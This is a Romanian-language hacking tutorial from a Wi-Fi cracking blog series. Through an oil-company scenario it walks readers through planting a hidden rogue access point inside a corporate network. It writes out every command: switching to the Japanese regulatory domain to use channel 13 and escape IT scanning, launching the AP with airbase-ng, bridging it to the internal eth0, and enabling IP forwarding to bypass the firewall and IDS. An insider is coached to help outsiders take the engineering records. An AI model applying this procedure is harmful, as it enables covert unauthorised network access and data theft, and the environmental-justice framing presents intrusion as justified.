Lansarea unui Rogue AP cu scopul de a extrage informații, în timp ce rămânem nedetectați

0

Bine ați revenit, dragii mei greenhorn hackers!

Continuăm seria dedicată spargerii parolelor Wi-Fi, unde ne vom concentra pe crearea unui punct de acces invizibil, un punct de acces ce nu este autorizat de personalul de la IT și care poate reprezenta o vulnerabilitate semnificativă pentru securitatea unei firme. De reținut! Așa cum am spus într-un alt articol, că spargerea rețelelor wireless nu se rezumă doar la parolele Wi-Fi.


Scenariul nostru

În acest scenariu o să investigăm o firmă petrolieră. Firma pe care o investigăm a scos piatră și gresie de sub suprafața pământului, utilizând o tehnică ce injectează nisip, apă și substanțe chimice subterane cu scopul de a elibera petrol și gaze.

Locuitorii din zonă încep să se îmbolnăvească

În ultima vreme,  s-au îmbolnăvit mai mulți locuitori și unul a murit. Rezidenții suspectează că substanțele chimice pe care compania petrolieră le folosește în soluția lor a otrăvit apa subterană, ducând la diferite boli și în cele din urmă la deces.

Firma petrolieră neagă cu vehemență orice rol în provocarea bolilor sau moartea locuitorilor, susținând că substanțele chimice pe care le injectează în pământ sunt inofensive.

Deși nu știm nimic sigur, am auzit zvonuri că firma petrolieră utilizează toluen, o substanță foarte toxică. Dacă acest lucru este adevărat și a fost eliberată în apele subterane, vor fi provocate mai multe decese.


Ajutăm la descoperirea adevărului, utilizând un Rogue AP

Suntem hotărâți ca acest lucru să nu se mai întâmple din nou și decidem să lucrăm cu o societate ce are ca scop protecția mediului, dar și cu alți hackeri pentru a încerca să dezvăluim dacă firma respectivă utilizează toluen.

Avem nevoie de arhivele grupului de ingineri pentru a dovedi că firma ne-a mințit, și că aceștia continuă să otrăvească apa din jur.

Pentru că un angajat al companiei este de partea noastră, îl învățăm să lanseze un Rogue AP, ce va ocoli firewall-ul companiei și IDS-ul (sistemul de detectare a intruziunilor), ce va fi invizibil pentru echipa IT, și să ne ofere acces nelimitat la rețeaua și înregistrările firmei.

Cum de nu este detectat un Rogue AP?

În Statele Unite, FCC reglementează industria și tehnologiile wireless și a decis să se utilizeze doar canalele 1-11. În România, cele mai utilizate canale sunt canalele 1 – 12, din câte am observat. Alte națiuni folosesc 1-14.

Un punct de acces care comunică pe canalele 12, 13 sau 14 ar fi complet invizibil pentru adaptoarele wireless construite pentru a capta doar canalele 1-12. Dacă putem face ca Rogue AP-ul nostru să comunice pe canalul 13 sau 14, de exemplu, ar fi invizibil pentru angajații IT de la compania de foraj petrolier sau oricare altă companie. Desigur, ar trebui să ne setăm adaptoarele wireless să comunice pe canalul 13/14 pentru a putea să ne conectăm.

Pasul 1: Schimbăm domeniul de reglementare al adaptorului wireless

Deoarece Japonia permite canalele 1-14, va trebui să ne fixăm punctul de acces pentru a folosi domeniul de reglementare japonez, pentru a putea comunica pe canalele 13 și 14.




Putem face asta prin următoarele comenzi:

  • iw reg set JP
  • iwconfig wlan0 channel 13
  • iwconfig

Pasul 2: Punem adaptorul wireless în modul monitor

După aceea, punem adaptorul wireless în modul monitor.

  • airmon-ng start wlan0

Pasul 3: Lansăm punctul nostru de acces

Suita aircrack-ng conține un instrument numit airbase-ng pentru crearea unui AP de la adaptorul nostru wireless. Putem să o folosim tastând:

  • airbase-ng -c 13 mon0
  • -c 13 indică faptul că se va comunica pe canalul 13
  • mon0 indică adaptorul wireless utilizat pentru lansarea AP-ului

Pasul 4: Conectăm AP-ul nostru la rețeaua lor

Acum, că am creat un AP, trebuie să îl conectăm la rețeaua internă a companiei petroliere. În acest fel, traficul prin AP va merge direct în rețeaua internă corporativă și va trece de securitatea acestuia, inclusiv orice firewall sau sistem de detectare a intruziunilor.



Mai întâi, deschidem un nou terminal, realizăm o conexiune și o numim “Blackweb-Bridge”. Facem acest lucru introducând:

  • brctl addbr Blackweb-Bridge
  • apt install bridge-utils (dacă nu avem utilitatea instalată)

Pasul 5: Adăugăm interfețe conexiunii

După realizarea conexiunii va trebui să conectăm ambele interfețe, una pentru rețeaua internă, eth0 și cealaltă de la interfața virtuală a AP-ului nostru, at0, la conexiunea noastră. Putem face acest lucru tastând:

  • brctl addif Blackweb-Bridge eth0
  • brctl addif Blackweb-Bridge at0

Pasul 6: Aducem interfețele mai sus

Trebuie să aducem mai sus sau să activam interfețele:

  • ifconfig eth0 0.0.0.0 up
  • ifconfig at0 0.0.0.0 up

Pasul 7: Activăm redirecționarea IP

Linux are o caracteristică specială pentru redirecționarea traficului sau redirecționarea IP în kernel. Putem face acest lucru prin:

  • echo 1 > /proc/sys/net/ipv4/ip_forward

Pasul 8: Navigăm în rețeaua internă

Când noi și cei care lucrează cu noi ne vom conecta la AP-ul invizibil (trebuie activat canalul 13 pe adaptorul wireless), vom avea acces la întreaga rețea corporativă internă.

În acest fel, putem obține informațiile de care avem nevoie de la departamentul de inginerie pentru a dovedi dacă soluția folosită conține toluen și dacă firma este responsabilă pentru otrăvirea apei potabile a comunității.


Rămâneți aproape…

Asigurați-vă că verificați tot timpul seria noastră dedicată spargerii rețelelor Wi-Fi deoarece se vor posta și mai multe hack-uri wireless! Dacă aveți întrebări, vă rugăm să comentați mai jos, iar noi vom încerca să vă ajutăm.

Choose your Reaction!
Leave a Comment

Your email address will not be published.

Opțiunea copy-paste a fost dezactivată pentru acest site.